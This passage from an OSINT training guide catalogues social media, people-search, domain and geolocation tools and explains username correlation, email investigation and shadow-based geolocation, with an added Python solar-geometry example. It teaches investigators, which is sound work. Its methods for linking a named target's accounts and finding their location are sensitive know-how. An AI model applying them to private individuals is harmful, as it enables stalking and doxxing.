  Social Media Investigation Tools
&lt;/h3&gt;

&lt;p&gt;Social media platforms contain vast amounts of valuable information for OSINT investigations.&lt;/p&gt;

&lt;h4&gt;
  
  
  Cross-Platform Tools
&lt;/h4&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;Social Searcher&lt;/strong&gt;: Search across multiple social platforms without logging in&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Hootsuite&lt;/strong&gt;: Monitor multiple social networks from one dashboard&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Mention&lt;/strong&gt;: Track mentions across social media and the web&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Brand24&lt;/strong&gt;: Social media monitoring and analytics tool&lt;/li&gt;
&lt;/ul&gt;

&lt;h4&gt;
  
  
  Twitter/X Tools
&lt;/h4&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;TweetDeck&lt;/strong&gt;: Advanced Twitter dashboard for monitoring multiple feeds&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Twint&lt;/strong&gt;: Twitter scraping tool that doesn't use Twitter's API&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Twitonomy&lt;/strong&gt;: Detailed Twitter analytics and insights&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Foller.me&lt;/strong&gt;: Twitter analytics focused on account behavior&lt;/li&gt;
&lt;/ul&gt;

&lt;h4&gt;
  
  
  Instagram Tools
&lt;/h4&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;Instaloader&lt;/strong&gt;: Download Instagram profiles, hashtags, and locations&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;ImgInn&lt;/strong&gt;: View Instagram profiles without an account&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Picuki&lt;/strong&gt;: Instagram editor and viewer&lt;/li&gt;
&lt;/ul&gt;

&lt;h4&gt;
  
  
  Facebook Tools
&lt;/h4&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;Who Posted What&lt;/strong&gt;: Search Facebook posts by date range and keywords&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;StalkScan&lt;/strong&gt;: Find information that might be hidden but publicly available&lt;/li&gt;
&lt;/ul&gt;

&lt;h3&gt;
  
  
  People Search and Background Check Tools
&lt;/h3&gt;

&lt;h4&gt;
  
  
  General People Search
&lt;/h4&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;Pipl&lt;/strong&gt;: Comprehensive people search engine (paid)&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Spokeo&lt;/strong&gt;: People search engine with contact info and social profiles&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;That's Them&lt;/strong&gt;: Free people and business search&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Hunter.io&lt;/strong&gt;: Find email addresses by domain name&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Clearbit Connect&lt;/strong&gt;: Find email addresses and company information&lt;/li&gt;
&lt;/ul&gt;

&lt;h4&gt;
  
  
  Public Records
&lt;/h4&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;BeenVerified&lt;/strong&gt;: Background check service (paid)&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;TruthFinder&lt;/strong&gt;: Public records search (paid)&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;PACER&lt;/strong&gt;: Public Access to Court Electronic Records (US)&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;SearchSystems&lt;/strong&gt;: Directory of free public records&lt;/li&gt;
&lt;/ul&gt;

&lt;h4&gt;
  
  
  Username and Identity
&lt;/h4&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;Namechk&lt;/strong&gt;: Check username availability across multiple platforms&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;WhatsMyName&lt;/strong&gt;: Find usernames across many platforms&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Sherlock&lt;/strong&gt;: Command-line tool to find usernames across social networks&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;GHunt&lt;/strong&gt;: Investigate Google accounts with an email&lt;/li&gt;
&lt;/ul&gt;

&lt;h3&gt;
  
  
  Website and Domain Analysis Tools
&lt;/h3&gt;

&lt;h4&gt;
  
  
  WHOIS and Domain Tools
&lt;/h4&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;ICANN WHOIS&lt;/strong&gt;: Official WHOIS lookup for domain registration information&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;DomainTools&lt;/strong&gt;: Comprehensive domain intelligence (paid)&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;ViewDNS.info&lt;/strong&gt;: Multiple DNS and domain lookup tools&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Whoxy&lt;/strong&gt;: WHOIS search with historical data (paid)&lt;/li&gt;
&lt;/ul&gt;

&lt;h4&gt;
  
  
  Website Analysis
&lt;/h4&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;BuiltWith&lt;/strong&gt;: Discover what technologies websites are using&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Wappalyzer&lt;/strong&gt;: Browser extension that identifies web technologies&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;SpyOnWeb&lt;/strong&gt;: Find websites sharing the same tracking codes&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Similar Web&lt;/strong&gt;: Website traffic and analytics&lt;/li&gt;
&lt;/ul&gt;

&lt;h4&gt;
  
  
  Historical Analysis
&lt;/h4&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;Wayback Machine&lt;/strong&gt;: View archived versions of websites&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Archive.today&lt;/strong&gt;: Another web archiving service&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Cached View&lt;/strong&gt;: View Google's cached version of pages&lt;/li&gt;
&lt;/ul&gt;

&lt;h4&gt;
  
  
  Security and Infrastructure
&lt;/h4&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;Shodan&lt;/strong&gt;: Search engine for internet-connected devices&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Censys&lt;/strong&gt;: Search engine for internet devices and certificates&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;SecurityTrails&lt;/strong&gt;: DNS, domain, and IP intelligence&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;VirusTotal&lt;/strong&gt;: Analyze suspicious websites and files&lt;/li&gt;
&lt;/ul&gt;

&lt;h3&gt;
  
  
  Geolocation and Mapping Tools
&lt;/h3&gt;

&lt;h4&gt;
  
  
  Mapping Platforms
&lt;/h4&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;Google Maps&lt;/strong&gt;: Comprehensive mapping with Street View and satellite imagery&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Google Earth&lt;/strong&gt;: 3D representation of Earth with historical imagery&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Bing Maps&lt;/strong&gt;: Alternative mapping platform with Bird's Eye view&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;OpenStreetMap&lt;/strong&gt;: Open-source mapping platform with detailed data&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Wikimapia&lt;/strong&gt;: Crowdsourced map with annotated locations&lt;/li&gt;
&lt;/ul&gt;

&lt;h4&gt;
  
  
  Specialized Geolocation Tools
&lt;/h4&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;SunCalc&lt;/strong&gt;: Calculate sun positions and phases for any location and time&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;ShadowCalculator&lt;/strong&gt;: Analyze shadows to determine time and location&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;GeoGuessr&lt;/strong&gt;: Practice geolocation skills with a game format&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Mapillary&lt;/strong&gt;: Crowdsourced street-level imagery&lt;/li&gt;
&lt;/ul&gt;

&lt;h4&gt;
  
  
  Location Data Tools
&lt;/h4&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;IP Geolocation&lt;/strong&gt;: Tools like IP2Location and MaxMind&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;What3Words&lt;/strong&gt;: Location reference system using three words&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;ExifTool&lt;/strong&gt;: Extract location data from image metadata&lt;/li&gt;
&lt;/ul&gt;

&lt;h3&gt;
  
  
  Image and Media Analysis Tools
&lt;/h3&gt;

&lt;h4&gt;
  
  
  Reverse Image Search
&lt;/h4&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;Google Images&lt;/strong&gt;: Find similar images and sources&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;TinEye&lt;/strong&gt;: Reverse image search with historical results&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Yandex Images&lt;/strong&gt;: Often finds matches that Google misses&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Bing Visual Search&lt;/strong&gt;: Microsoft's reverse image search&lt;/li&gt;
&lt;/ul&gt;

&lt;h4&gt;
  
  
  Metadata Analysis
&lt;/h4&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;ExifTool&lt;/strong&gt;: Extract metadata from images and files&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Jeffrey's Image Metadata Viewer&lt;/strong&gt;: Online EXIF data viewer&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Forensically&lt;/strong&gt;: Digital image forensics tool&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;FotoForensics&lt;/strong&gt;: Error Level Analysis and metadata extraction&lt;/li&gt;
&lt;/ul&gt;

&lt;h4&gt;
  
  
  Video Analysis
&lt;/h4&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;InVID&lt;/strong&gt;: Video verification plugin&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;YouTube DataViewer&lt;/strong&gt;: Extract hidden metadata from YouTube videos&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Frame by Frame&lt;/strong&gt;: Analyze videos frame by frame&lt;/li&gt;
&lt;/ul&gt;

&lt;h3&gt;
  
  
  Data Organization and Visualization Tools
&lt;/h3&gt;

&lt;h4&gt;
  
  
  Note-Taking and Organization
&lt;/h4&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;Hunchly&lt;/strong&gt;: Capture and organize web pages during investigations&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Notion&lt;/strong&gt;: All-in-one workspace for notes and databases&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Obsidian&lt;/strong&gt;: Knowledge base with linked notes&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Joplin&lt;/strong&gt;: Open-source note-taking with encryption&lt;/li&gt;
&lt;/ul&gt;

&lt;h4&gt;
  
  
  Link Analysis and Visualization
&lt;/h4&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;Maltego&lt;/strong&gt;: Interactive data mining and visualization&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Gephi&lt;/strong&gt;: Open-source network visualization software&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;NodeXL&lt;/strong&gt;: Excel template for network analysis&lt;/li&gt;
&lt;/ul&gt;

&lt;h4&gt;
  
  
  Timeline Tools
&lt;/h4&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;Timeline JS&lt;/strong&gt;: Create interactive timelines&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Aeon Timeline&lt;/strong&gt;: Timeline visualization software (paid)&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Tiki-Toki&lt;/strong&gt;: Web-based timeline maker&lt;/li&gt;
&lt;/ul&gt;

&lt;h4&gt;
  
  
  Data Analysis
&lt;/h4&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;OpenRefine&lt;/strong&gt;: Clean and transform data&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Tableau Public&lt;/strong&gt;: Data visualization platform&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;R with RStudio&lt;/strong&gt;: Statistical computing and graphics&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Python with Jupyter Notebooks&lt;/strong&gt;: Data analysis and visualization&lt;/li&gt;
&lt;/ul&gt;

&lt;h3&gt;
  
  
  Automation and Programming Tools
&lt;/h3&gt;

&lt;h4&gt;
  
  
  OSINT Frameworks
&lt;/h4&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;Recon-ng&lt;/strong&gt;: Web reconnaissance framework&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;SpiderFoot&lt;/strong&gt;: Automated OSINT collection platform&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;theHarvester&lt;/strong&gt;: Email, subdomain, and name harvester&lt;/li&gt;
&lt;/ul&gt;

&lt;h4&gt;
  
  
  Key Python Libraries
&lt;/h4&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;Requests&lt;/strong&gt;: HTTP library for web requests&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Beautiful Soup&lt;/strong&gt;: Web scraping library&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Selenium&lt;/strong&gt;: Browser automation&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Tweepy&lt;/strong&gt;: Twitter API library&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;NLTK&lt;/strong&gt;: Natural Language Toolkit for text analysis&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Pandas&lt;/strong&gt;: Data analysis library&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;NetworkX&lt;/strong&gt;: Network analysis and visualization&lt;/li&gt;
&lt;/ul&gt;




&lt;h2&gt;
  
  
  5) Digital Footprint Investigation
&lt;/h2&gt;

&lt;h3&gt;
  
  
  Understanding Digital Footprint Types
&lt;/h3&gt;

&lt;p&gt;Digital footprints can be categorized into two main types:&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Active Digital Footprints&lt;/strong&gt; (intentionally created):&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Social media posts and profiles&lt;/li&gt;
&lt;li&gt;Blog comments and forum participation&lt;/li&gt;
&lt;li&gt;Online reviews and ratings&lt;/li&gt;
&lt;li&gt;Publicly shared photos and videos&lt;/li&gt;
&lt;li&gt;Website registrations and account creation&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;&lt;strong&gt;Passive Digital Footprints&lt;/strong&gt; (created without direct user action):&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;IP address logs and geolocation data&lt;/li&gt;
&lt;li&gt;Browser cookies and tracking pixels&lt;/li&gt;
&lt;li&gt;Metadata embedded in files&lt;/li&gt;
&lt;li&gt;Server access logs&lt;/li&gt;
&lt;li&gt;Third-party data collection&lt;/li&gt;
&lt;/ul&gt;

&lt;h3&gt;
  
  
  Username Analysis and Correlation
&lt;/h3&gt;

&lt;p&gt;Username analysis is often the starting point for digital footprint investigations. Users commonly follow recognizable patterns when creating usernames:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Consistent base name with platform-specific suffixes&lt;/li&gt;
&lt;li&gt;Professional vs. personal username variations&lt;/li&gt;
&lt;li&gt;Age-related patterns (birth years, graduation years)&lt;/li&gt;
&lt;li&gt;Geographic indicators (city codes, area codes)&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;&lt;strong&gt;Systematic username investigation involves&lt;/strong&gt;:&lt;/p&gt;

&lt;ol&gt;
&lt;li&gt;Starting with known usernames from target profiles&lt;/li&gt;
&lt;li&gt;Generating variations and checking multiple platforms&lt;/li&gt;
&lt;li&gt;Documenting all discovered accounts&lt;/li&gt;
&lt;li&gt;Correlating information across platforms&lt;/li&gt;
&lt;li&gt;Identifying patterns that suggest the same individual&lt;/li&gt;
&lt;/ol&gt;

&lt;h3&gt;
  
  
  Email Address Investigation Techniques
&lt;/h3&gt;

&lt;p&gt;Email addresses are powerful investigative tools that can reveal extensive information about an individual's online presence.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Approaches include&lt;/strong&gt;:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;Username extraction&lt;/strong&gt;: The local part (before @) often serves as a username&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Domain analysis&lt;/strong&gt;: Corporate, educational, or free email providers reveal affiliations&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Account discovery&lt;/strong&gt;: Finding services registered with the email&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Historical analysis&lt;/strong&gt;: Tracking email usage over time&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Associated accounts&lt;/strong&gt;: Identifying linked social media and service accounts&lt;/li&gt;
&lt;/ul&gt;

&lt;h3&gt;
  
  
  Reverse Image Search and Visual Analysis
&lt;/h3&gt;

&lt;p&gt;Images contain valuable metadata and can be found across multiple platforms, making them powerful tools for digital footprint analysis.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Image Verification Process&lt;/strong&gt;:&lt;/p&gt;

&lt;ol&gt;
&lt;li&gt;Perform reverse image search across multiple engines&lt;/li&gt;
&lt;li&gt;Check for image manipulation or editing&lt;/li&gt;
&lt;li&gt;Extract and analyze metadata (if available)&lt;/li&gt;
&lt;li&gt;Compare with known authentic images&lt;/li&gt;
&lt;li&gt;Document all findings and sources&lt;/li&gt;
&lt;/ol&gt;




&lt;h2&gt;
  
  
  6) Geolocation Techniques
&lt;/h2&gt;

&lt;h3&gt;
  
  
  Introduction to Geolocation
&lt;/h3&gt;

&lt;p&gt;Geolocation is one of the most valuable skills in an OSINT investigator's toolkit. It involves determining the physical location where a photo or video was taken, or where a person or object is located, using only publicly available information.&lt;/p&gt;

&lt;h3&gt;
  
  
  Visual Clues in Geolocation
&lt;/h3&gt;

&lt;p&gt;Successful geolocation often begins with careful observation of visual elements:&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Architectural Features&lt;/strong&gt;:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Building styles and materials&lt;/li&gt;
&lt;li&gt;Distinctive landmarks or structures&lt;/li&gt;
&lt;li&gt;Roof designs and colors&lt;/li&gt;
&lt;li&gt;Street layouts and urban planning characteristics&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;&lt;strong&gt;Environmental Indicators&lt;/strong&gt;:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Vegetation types and patterns&lt;/li&gt;
&lt;li&gt;Terrain features (mountains, coastlines, etc.)&lt;/li&gt;
&lt;li&gt;Climate indicators (snow, desert conditions, etc.)&lt;/li&gt;
&lt;li&gt;Water features (rivers, lakes, oceans)&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;&lt;strong&gt;Human Elements&lt;/strong&gt;:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Language on signs and advertisements&lt;/li&gt;
&lt;li&gt;Vehicle types, license plates, and driving side&lt;/li&gt;
&lt;li&gt;Clothing styles and cultural indicators&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;&lt;strong&gt;Infrastructure&lt;/strong&gt;:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Road markings and traffic signs&lt;/li&gt;
&lt;li&gt;Utility poles and street lighting&lt;/li&gt;
&lt;li&gt;Construction styles for bridges, barriers, etc.&lt;/li&gt;
&lt;/ul&gt;

&lt;h3&gt;
  
  
  Shadow Analysis
&lt;/h3&gt;

&lt;p&gt;Shadow analysis is a powerful technique for determining the time of day, time of year, and even the hemisphere where an image was taken.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Basic Principles&lt;/strong&gt;:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;In the Northern Hemisphere, shadows point northward during midday&lt;/li&gt;
&lt;li&gt;In the Southern Hemisphere, shadows point southward during midday&lt;/li&gt;
&lt;li&gt;Shadow length varies by time of day and season&lt;/li&gt;
&lt;li&gt;Shadow direction changes throughout the day as the sun moves east to west&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;&lt;strong&gt;Shadow Analysis Process&lt;/strong&gt;:&lt;/p&gt;

&lt;ol&gt;
&lt;li&gt;Identify vertical objects and their shadows in the image&lt;/li&gt;
&lt;li&gt;Determine the shadow direction relative to the object&lt;/li&gt;
&lt;li&gt;Estimate the shadow length relative to the object's height&lt;/li&gt;
&lt;li&gt;Use tools like SunCalc.org to match potential dates and times&lt;/li&gt;
&lt;li&gt;Cross-reference with other visual clues&lt;/li&gt;
&lt;/ol&gt;
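<![CDATA[<p>Added example (not from the original guide): the solar geometry behind steps 3 and 4, in Python. It works in solar time, where solar noon is 12.0; converting that to clock time needs longitude, the equation of time and daylight-saving rules, which is the part SunCalc handles for you.</p>

```python
import math

# Added example (not from the original guide): solar geometry used in shadow
# analysis. All times are solar time (solar noon = 12.0); SunCalc.org converts
# that to clock time using longitude, the equation of time and DST.


def declination_deg(day_of_year):
    """Solar declination in degrees (Cooper's approximation, about 1 degree accuracy)."""
    return 23.44 * math.sin(math.radians(360.0 / 365.0 * (284 + day_of_year)))


def elevation_deg(lat_deg, day_of_year, hour_angle_deg):
    """Sun elevation above the horizon. The hour angle is 0 at solar noon and
    advances 15 degrees per hour (negative before noon)."""
    phi = math.radians(lat_deg)
    delta = math.radians(declination_deg(day_of_year))
    h = math.radians(hour_angle_deg)
    sin_el = math.sin(phi) * math.sin(delta) + math.cos(phi) * math.cos(delta) * math.cos(h)
    return math.degrees(math.asin(max(-1.0, min(1.0, sin_el))))


def shadow_ratio(elevation):
    """Shadow length divided by object height for a vertical object (step 3)."""
    if elevation <= 0.0:
        return math.inf          # sun below the horizon: no shadow to measure
    return 1.0 / math.tan(math.radians(elevation))


def midday_shadow_direction(lat_deg, day_of_year):
    """Direction a vertical object's shadow points at solar noon. The
    'north in the Northern Hemisphere' rule holds only when the observer is
    north of the sun's declination; inside the tropics it flips for part of the year."""
    delta = declination_deg(day_of_year)
    if lat_deg > delta:
        return "north"
    if lat_deg < delta:
        return "south"
    return "none"                # sun directly overhead at noon


def candidate_solar_times(lat_deg, day_of_year, ratio):
    """Invert the elevation formula: the two solar times (morning, afternoon)
    at which a measured shadow/height ratio (ratio must be positive) occurs on
    that date and latitude, or None if the sun never gets that high there."""
    el = math.atan(1.0 / ratio)
    phi = math.radians(lat_deg)
    delta = math.radians(declination_deg(day_of_year))
    cos_h = (math.sin(el) - math.sin(phi) * math.sin(delta)) / (math.cos(phi) * math.cos(delta))
    if abs(cos_h) > 1.0:
        return None
    h_deg = math.degrees(math.acos(cos_h))
    return (12.0 - h_deg / 15.0, 12.0 + h_deg / 15.0)


def days_consistent_with(lat_deg, ratio, hour_angle_deg, tolerance=0.02):
    """Days of the year on which the ratio occurs at the given hour angle,
    narrowing the time of year (step 4) before cross-referencing other clues."""
    return [day for day in range(1, 366)
            if abs(shadow_ratio(elevation_deg(lat_deg, day, hour_angle_deg)) - ratio) < tolerance]


if __name__ == "__main__":
    print("noon shadow on day 172 at 40N points", midday_shadow_direction(40.0, 172))
    print("solar times for ratio 3.78 at 40N on day 172:", candidate_solar_times(40.0, 172, 3.78))
```
]]>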

&lt;h3&gt;
  
  
  Geolocation Workflow
&lt;/h3&gt;

&lt;p&gt;Successful geolocation typically follows a methodical workflow:&lt;/p&gt;

&lt;ol&gt;
&lt;li&gt;
&lt;strong&gt;Initial Assessment&lt;/strong&gt;: Examine the image carefully and note all potential clues&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Metadata Check&lt;/strong&gt;: Extract and analyze any available EXIF data&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Clue Prioritization&lt;/strong&gt;: Identify the most distinctive or unique elements&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Research&lt;/strong&gt;: Research unfamiliar elements (e.g., architectural styles, signage)&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Narrowing Down&lt;/strong&gt;: Use clues to narrow the geographic area&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Mapping Tool Search&lt;/strong&gt;: Use satellite imagery and mapping tools&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Verification&lt;/strong&gt;: Confirm the location by matching multiple elements&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Documentation&lt;/strong&gt;: Document your findings and the process used&lt;/li&gt;
&lt;/ol&gt;




&lt;h2&gt;
  
  
  7) GIS for OSINT
&lt;/h2&gt;

&lt;h3&gt;
  
  
  GIS Fundamentals
&lt;/h3&gt;

&lt;p&gt;Geographic Information Systems (GIS) are powerful tools that can significantly enhance OSINT investigations by providing spatial context to information.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Key GIS Concepts&lt;/strong&gt;:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;Spatial Data&lt;/strong&gt;: Information identifying geographic location of features and boundaries&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Layers&lt;/strong&gt;: Different sets of spatial data that can be overlaid on a map&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Vector Data&lt;/strong&gt;: Represents features as points, lines, and polygons&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Raster Data&lt;/strong&gt;: Represents features as a grid of cells or pixels (e.g., satellite imagery)&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Attributes&lt;/strong&gt;: Non-spatial information associated with geographic features&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Geocoding&lt;/strong&gt;: Converting addresses to geographic coordinates&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Spatial Analysis&lt;/strong&gt;: Examining locations, attributes, and relationships of features&lt;/li&gt;
&lt;/ul&gt;

&lt;h3&gt;
  
  
  GIS Tools for OSINT
&lt;/h3&gt;

&lt;p&gt;&lt;strong&gt;Web-Based GIS Tools&lt;/strong&gt;:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;Google Earth Web&lt;/strong&gt;: Browser-based version with historical imagery&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Google Maps&lt;/strong&gt;: Familiar interface with Street View and measurements&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Bing Maps&lt;/strong&gt;: Alternative with Bird's Eye view&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;OpenStreetMap&lt;/strong&gt;: Community-driven map with detailed infrastructure data&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;&lt;strong&gt;Desktop GIS Software&lt;/strong&gt;:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;Google Earth Pro&lt;/strong&gt;: Free desktop application with advanced features&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;QGIS&lt;/strong&gt;: Powerful open-source GIS software&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;ArcGIS&lt;/strong&gt;: Commercial GIS software with extensive capabilities&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;&lt;strong&gt;Specialized OSINT GIS Tools&lt;/strong&gt;:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;Heatmap.io&lt;/strong&gt;: Create heat maps from location data&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Echosec&lt;/strong&gt;: Social media monitoring with geospatial capabilities&lt;/li&gt;
&lt;/ul&gt;




&lt;h2&gt;
  
  
  Learning Resources
&lt;/h2&gt;

&lt;h3&gt;
  
  
  OSINT Training and Education
&lt;/h3&gt;

&lt;p&gt;&lt;strong&gt;Comprehensive OSINT Resources&lt;/strong&gt;:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;a href="https://osintframework.com/" rel="noopener noreferrer"&gt;&lt;strong&gt;OSINT Framework&lt;/strong&gt;&lt;/a&gt; - Centralized directory of OSINT tools&lt;/li&gt;
&lt;li&gt;
&lt;a href="https://github.com/K2SOsint/Legendary_OSINT" rel="noopener noreferrer"&gt;&lt;strong&gt;Legendary OSINT&lt;/strong&gt;&lt;/a&gt; - Curated list of OSINT tools and resources&lt;/li&gt;
&lt;li&gt;
&lt;a href="https://giriaryan694-a11y.github.io/ary.osint/" rel="noopener noreferrer"&gt;&lt;strong&gt;ary.osint&lt;/strong&gt;&lt;/a&gt; - Comprehensive OSINT toolkit with 100+ tools&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;&lt;strong&gt;Google OSINT Guide&lt;/strong&gt;:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;a href="https://github.com/Nervi0z/Google-OSINT" rel="noopener noreferrer"&gt;&lt;strong&gt;Practical Google OSINT guide&lt;/strong&gt;&lt;/a&gt; - Covers operators, dorking, reverse image search, geospatial intelligence&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;&lt;strong&gt;OSINT Training&lt;/strong&gt;:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;a href="https://osinttraining.net/" rel="noopener noreferrer"&gt;&lt;strong&gt;KeyNorth Group OSINT Training&lt;/strong&gt;&lt;/a&gt; - Free online OSINT training with practical exercises&lt;/li&gt;
&lt;/ul&gt;

&lt;h3&gt;
  
  
  Geolocation Resources
&lt;/h3&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;a href="https://www.suncalc.org/" rel="noopener noreferrer"&gt;&lt;strong&gt;SunCalc&lt;/strong&gt;&lt;/a&gt; - Analyze sun positions and shadows for any location and date&lt;/li&gt;
&lt;li&gt;
